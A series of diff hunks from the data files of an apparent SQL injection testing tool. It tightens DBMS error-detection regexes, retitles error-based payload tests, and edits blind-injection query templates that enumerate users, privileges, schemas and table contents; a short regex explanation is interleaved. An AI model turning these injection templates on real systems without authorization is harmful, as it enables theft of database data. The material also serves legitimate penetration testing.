|
||||
<error regexp="CLI Driver.*DB2"/>
|
||||
<error regexp="CLI Driver.*?DB2"/>
|
||||
<error regexp="DB2 SQL error"/>
|
||||
<error regexp="\bdb2_\w+\("/>
|
||||
<error regexp="SQLSTATE.+SQLCODE"/>
|
||||
@@ -70,7 +71,7 @@
|
||||
|
||||
<!-- Informix -->
|
||||
<dbms value="Informix">
|
||||
<error regexp="Exception.*Informix"/>
|
||||
<error regexp="Exception.*?Informix"/>
|
||||
<error regexp="Informix ODBC Driver"/>
|
||||
<error regexp="com\.informix\.jdbc"/>
|
||||
<error regexp="weblogic\.jdbc\.informix"/>
|
||||
@@ -79,51 +80,54 @@
|
||||
<!-- Interbase/Firebird -->
|
||||
<dbms value="Firebird">
|
||||
<error regexp="Dynamic SQL Error"/>
|
||||
<error regexp="Warning.*ibase_.*"/>
|
||||
<error regexp="Warning.*?ibase_"/>
|
||||
</dbms>
|
||||
|
||||
<!-- SQLite -->
|
||||
<dbms value="SQLite">
|
||||
<error regexp="SQLite/JDBCDriver"/>
|
||||
<error regexp="SQLite\.Exception"/>
|
||||
<error regexp="System\.Data\.SQLite\.SQLiteException"/>
|
||||
<error regexp="Warning.*sqlite_.*"/>
|
||||
<error regexp="Warning.*SQLite3::"/>
|
||||
<error regexp="(Microsoft|System)\.Data\.SQLite\.SQLiteException"/>
|
||||
<error regexp="Warning.*?sqlite_"/>
|
||||
<error regexp="Warning.*?SQLite3::"/>
|
||||
<error regexp="\[SQLITE_ERROR\]"/>
|
||||
<error regexp="SQLite error \d+:"/>
|
||||
<error regexp="sqlite3.OperationalError:"/>
|
||||
</dbms>
|
||||
|
||||
<!-- SAP MaxDB -->
|
||||
<dbms value="SAP MaxDB">
|
||||
<error regexp="SQL error.*POS([0-9]+).*"/>
|
||||
<error regexp="Warning.*maxdb.*"/>
|
||||
<error regexp="SQL error.*?POS([0-9]+)"/>
|
||||
<error regexp="Warning.*?maxdb"/>
|
||||
</dbms>
|
||||
|
||||
<!-- Sybase -->
|
||||
<dbms value="Sybase">
|
||||
<error regexp="Warning.*sybase.*"/>
|
||||
<error regexp="Warning.*?sybase"/>
|
||||
<error regexp="Sybase message"/>
|
||||
<error regexp="Sybase.*Server message.*"/>
|
||||
<error regexp="Sybase.*?Server message"/>
|
||||
<error regexp="SybSQLException"/>
|
||||
<error regexp="com\.sybase\.jdbc"/>
|
||||
</dbms>
|
||||
|
||||
<!-- Ingres -->
|
||||
<dbms value="Ingres">
|
||||
<error regexp="Warning.*ingres_"/>
|
||||
<error regexp="Warning.*?ingres_"/>
|
||||
<error regexp="Ingres SQLSTATE"/>
|
||||
<error regexp="Ingres\W.*Driver"/>
|
||||
<error regexp="Ingres\W.*?Driver"/>
|
||||
</dbms>
|
||||
|
||||
<!-- Frontbase -->
|
||||
<dbms value="Frontbase">
|
||||
<error regexp="Exception (condition )?\d+. Transaction rollback."/>
|
||||
<error regexp="Exception (condition )?\d+\. Transaction rollback"/>
|
||||
<error regexp="com\.frontbase\.jdbc"/>
|
||||
</dbms>
|
||||
|
||||
<!-- HSQLDB -->
|
||||
<dbms value="HSQLDB">
|
||||
<error regexp="org\.hsqldb\.jdbc"/>
|
||||
<error regexp="Unexpected end of command in statement \["/>
|
||||
<error regexp="Unexpected token.*in statement \["/>
|
||||
<error regexp="Unexpected token.*?in statement \["/>
|
||||
</dbms>
|
||||
|
||||
</root>
|
||||
|
||||
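A recurring pattern in the xml/errors.xml hunks above is the switch from greedy `.*` to non-greedy `.*?` (and dropping trailing `.*`): detection still succeeds on the same pages, but the lazy form stops at the first hit and avoids needless scanning and backtracking on large response bodies. A short standalone illustration with an invented error string:

```python
import re

page = "Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/app.php"

greedy = re.search(r"Warning.*mysql_.*", page)   # old style: consumes to the end of the line
lazy = re.search(r"Warning.*?mysql_", page)      # new style: stops at the first mysql_

print(greedy.group())  # whole remainder of the line
print(lazy.group())    # "Warning: mysql_"
```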
@@ -28,7 +28,7 @@
|
||||
|
||||
<test>
|
||||
<!-- It does not work against ORDER BY or GROUP BY clause -->
|
||||
<title>MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)</title>
|
||||
<title>MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
@@ -72,7 +72,7 @@
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)</title>
|
||||
<title>MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
@@ -113,7 +113,7 @@
|
||||
|
||||
<test>
|
||||
<!-- It does not work against ORDER BY or GROUP BY clause -->
|
||||
<title>MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)</title>
|
||||
<title>MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)</title>
|
||||
<stype>2</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
@@ -305,7 +305,7 @@
|
||||
|
||||
<test>
|
||||
<!-- It does not work against ORDER BY or GROUP BY clause -->
|
||||
<title>MySQL >= 4.1 OR error-based - WHERE, HAVING clause (FLOOR)</title>
|
||||
<title>MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)</title>
|
||||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>3</risk>
|
||||
|
||||
@@ -194,7 +194,7 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s.%s"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" count="SELECT LTRIM(STR(COUNT(*))) FROM %s" count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" query3="SELECT %s FROM (SELECT %s, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS LIMIT FROM %s)x WHERE LIMIT=%d" count="SELECT LTRIM(STR(COUNT(*))) FROM %s" count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
|
||||
</dump_table>
|
||||
<search_db>
|
||||
<inband query="SELECT name FROM master..sysdatabases WHERE %s" condition="name"/>
|
||||
@@ -283,7 +283,7 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT ENTRY_VALUE FROM (SELECT %s AS ENTRY_VALUE,ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
<blind query="SELECT %s FROM (SELECT qq.*,ROWNUM AS LIMIT FROM %s qq) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->
|
||||
<search_db>
|
||||
@@ -506,7 +506,7 @@
|
||||
</roles>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %%s"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CHR(%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CHR(%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS value_table"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CHR(%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CHR(%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS qq"/>
|
||||
</dump_table>
|
||||
</dbms>
|
||||
|
||||
@@ -563,7 +563,7 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s.%s"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(VARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(VARCHAR(4000),%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS value_table"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(VARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(VARCHAR(4000),%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS qq"/>
|
||||
</dump_table>
|
||||
<search_db>
|
||||
<inband query="SELECT name FROM master..sysdatabases WHERE %s" condition="name"/>
|
||||
@@ -586,7 +586,7 @@
|
||||
<length query="LENGTH(RTRIM(CAST(%s AS CHAR(254))))"/>
|
||||
<isnull query="COALESCE(%s,' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="ROW_NUMBER() OVER () AS LIMIT %s) AS foobar WHERE LIMIT"/>
|
||||
<limit query="ROW_NUMBER() OVER () AS LIMIT %s) AS qq WHERE LIMIT"/>
|
||||
<limitregexp query="ROW_NUMBER\(\)\s+OVER\s+\(\)\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+"/>
|
||||
<limitgroupstart/>
|
||||
<limitgroupstop/>
|
||||
@@ -601,7 +601,7 @@
|
||||
<hex query="HEX(%s)"/>
|
||||
<inference query="SUBSTR((%s),%d,1)>'%c'"/>
|
||||
<!-- NOTE: We have to use the complicated UDB OLAP functions in query2 because sqlmap injects isnull query inside MAX function, else we would use: SELECT MAX(versionnumber) FROM sysibm.sysversions -->
|
||||
<banner query="SELECT service_level FROM TABLE(sysproc.env_get_inst_info())" query2="SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS LIMIT,versionnumber FROM sysibm.sysversions) AS foobar WHERE LIMIT=1"/>
|
||||
<banner query="SELECT service_level FROM TABLE(sysproc.env_get_inst_info())" query2="SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS LIMIT,versionnumber FROM sysibm.sysversions) AS qq WHERE LIMIT=1"/>
|
||||
<current_user query="SELECT user FROM SYSIBM.SYSDUMMY1"/>
|
||||
<!-- NOTE: On DB2 we use the current user as default schema (database) -->
|
||||
<current_db query="SELECT current server FROM SYSIBM.SYSDUMMY1"/>
|
||||
@@ -611,23 +611,23 @@
|
||||
<is_dba query="(SELECT dbadmauth FROM syscat.dbauth WHERE grantee=current user)='Y'"/>
|
||||
<users>
|
||||
<inband query="SELECT grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
|
||||
<blind query="SELECT grantee FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC') AS foobar WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(grantee)) FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
|
||||
<blind query="SELECT grantee FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC') AS qq WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(grantee)) FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
|
||||
</users>
|
||||
<!-- NOTE: On DB2 it is not possible to list password hashes, since they are handled by the OS -->
|
||||
<passwords/>
|
||||
<privileges>
|
||||
<inband query="SELECT grantee,RTRIM(tabschema)||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM syscat.tabauth" condition="grantee"/>
|
||||
<blind query="SELECT tabschema||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS foobar WHERE LIMIT=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
|
||||
<blind query="SELECT tabschema||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS qq WHERE LIMIT=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
|
||||
</privileges>
|
||||
<roles/>
|
||||
<!-- NOTE: in DB2 schema names are the counterpart to database names on other DBMSes -->
|
||||
<dbs>
|
||||
<inband query="SELECT schemaname FROM syscat.schemata"/>
|
||||
<blind query="SELECT schemaname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,schemaname FROM syscat.schemata) AS foobar WHERE LIMIT=%d" count="SELECT COUNT(schemaname) FROM syscat.schemata"/>
|
||||
<blind query="SELECT schemaname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,schemaname FROM syscat.schemata) AS qq WHERE LIMIT=%d" count="SELECT COUNT(schemaname) FROM syscat.schemata"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT tabschema,tabname FROM sysstat.tables" condition="tabschema"/>
|
||||
<blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS foobar WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
|
||||
<blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS qq WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT name,RTRIM(coltype)||'('||RTRIM(CAST(length AS CHAR(254)))||')' FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
|
||||
@@ -635,19 +635,19 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT ENTRY_VALUE FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,%s AS ENTRY_VALUE FROM %s) AS foobar WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
<blind query="SELECT ENTRY_VALUE FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,%s AS ENTRY_VALUE FROM %s) AS qq WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<search_db>
|
||||
<inband query="SELECT schemaname FROM syscat.schemata WHERE %s" condition="schemaname"/>
|
||||
<blind query="SELECT schemaname FROM (SELECT DISTINCT(schemaname) FROM syscat.schemata WHERE %s) AS foobar" count="SELECT COUNT(DISTINCT(schemaname)) FROM syscat.schemata WHERE %s" condition="schemaname"/>
|
||||
<blind query="SELECT schemaname FROM (SELECT DISTINCT(schemaname) FROM syscat.schemata WHERE %s) AS qq" count="SELECT COUNT(DISTINCT(schemaname)) FROM syscat.schemata WHERE %s" condition="schemaname"/>
|
||||
</search_db>
|
||||
<search_table>
|
||||
<inband query="SELECT tabschema,tabname FROM sysstat.tables WHERE %s" condition="tabname" condition2="tabschema"/>
|
||||
<blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.tables WHERE %s) AS foobar" query2="SELECT DISTINCT(tabname) FROM sysstat.tables WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.tables WHERE %s" count2="SELECT COUNT(tabname) FROM sysstat.tables WHERE tabschema='%s'" condition="tabname" condition2="tabschema"/>
|
||||
<blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.tables WHERE %s) AS qq" query2="SELECT DISTINCT(tabname) FROM sysstat.tables WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.tables WHERE %s" count2="SELECT COUNT(tabname) FROM sysstat.tables WHERE tabschema='%s'" condition="tabname" condition2="tabschema"/>
|
||||
</search_table>
|
||||
<search_column>
|
||||
<inband query="SELECT tabschema,tabname FROM sysstat.columns WHERE %s" condition="colname" condition2="tabschema" condition3="tabname"/>
|
||||
<blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.columns WHERE %s) AS foobar" query2="SELECT DISTINCT(tabname) FROM sysstat.columns WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.columns WHERE %s" count2="SELECT COUNT(DISTINCT(tabname)) FROM sysstat.columns WHERE tabschema='%s'" condition="colname" condition2="tabschema" condition3="tabname"/>
|
||||
<blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.columns WHERE %s) AS qq" query2="SELECT DISTINCT(tabname) FROM sysstat.columns WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.columns WHERE %s" count2="SELECT COUNT(DISTINCT(tabname)) FROM sysstat.columns WHERE tabschema='%s'" condition="colname" condition2="tabschema" condition3="tabname"/>
|
||||
</search_column>
|
||||
</dbms>